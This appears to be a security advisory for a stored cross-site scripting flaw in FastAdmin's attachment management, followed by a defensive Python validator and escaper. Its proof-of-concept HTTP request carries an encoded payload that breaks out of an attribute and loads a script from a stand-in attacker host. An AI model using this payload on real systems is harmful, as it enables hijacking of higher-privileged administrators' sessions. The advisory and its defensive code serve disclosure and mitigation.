FastAdmin is a lightweight, efficient backend administration framework built on ThinkPHP. It is widely used for its simplicity and rich feature set.
FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the backend's General Management - Attachment Management section.
Details
Administrators who are allowed to manage attachments (for example, secondary administrators) can exploit this vulnerability to attack users with higher privileges, because the injected script runs in the browser of whoever later views the attachment entry.
The vulnerability is triggered by manipulating the row[url] field of an attachment edit request: the value is stored without validation and later rendered into the attachment management page.
Proof of Concept (POC)
POST /[admins' url].php/general/attachment/edit/ids/4?dialog=1 HTTP/1.1
Host: your-ip
Content-Length: 349
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [Cookies omitted for brevity]
Connection: close
row%5Bcategory%5D=unclassed&row%5Burl%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fattack.com/1.js%2FtndM%3E%2F%2F&row%5Bimagewidth%5D=1056&row%5Bimageheight%5D=626&row%5Bimagetype%5D=png&row%5Bimageframes%5D=0&row%5Bfilename%5D=test.png&row%5Bfilesize%5D=24535&row%5Bmimetype%5D=image%2Fpng&row%5Bextparam%5D=&row%5Buploadtime%5D=2024-08-01+15%3A00%3A40&row%5Bstorage%5D=local
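The following is an added defensive example, not FastAdmin code: it pulls row[url] out of a form body like the one in the PoC above, rejects values that could break out of an HTML attribute or load a remote script, and escapes the value on output. The allowed-URL policy (site-relative path or http(s) URL with a host) is an assumption for the example.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed sample bodies: the first is the PoC body above, reduced to the
# relevant fields; the second is a normal attachment path.
POC_BODY = ("row%5Bcategory%5D=unclassed"
            "&row%5Burl%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fattack.com/1.js%2FtndM%3E%2F%2F"
            "&row%5Bfilename%5D=test.png&row%5Bstorage%5D=local")
SAFE_BODY = ("row%5Bcategory%5D=unclassed"
             "&row%5Burl%5D=%2Fuploads%2F20240801%2Ftest.png&row%5Bstorage%5D=local")


def extract_url(body: str) -> str:
    """Return the decoded row[url] field of an application/x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("row[url]", [""])[0]


def is_safe_attachment_url(url: str) -> bool:
    """Storage-side check (assumed policy): accept only a site-relative path
    or an http(s) URL with a host, and reject anything containing quote,
    angle-bracket or whitespace characters, which is what the PoC relies on
    to close the attribute and open a <script> tag."""
    if not url or any(c in url for c in '<>"\'') or any(c.isspace() for c in url):
        return False
    parts = urlsplit(url)
    if parts.scheme in ("http", "https"):
        return bool(parts.netloc)
    # Reject other schemes (javascript:, data:) and protocol-relative //host/... URLs.
    if parts.scheme or url.startswith("//"):
        return False
    return url.startswith("/")


def render_attachment_link(url: str) -> str:
    """Rendering-side defence, applied regardless of the storage check:
    HTML-escape the value (including quotes) before placing it in markup."""
    safe = escape(url, quote=True)
    return '<a href="%s">%s</a>' % (safe, safe)
```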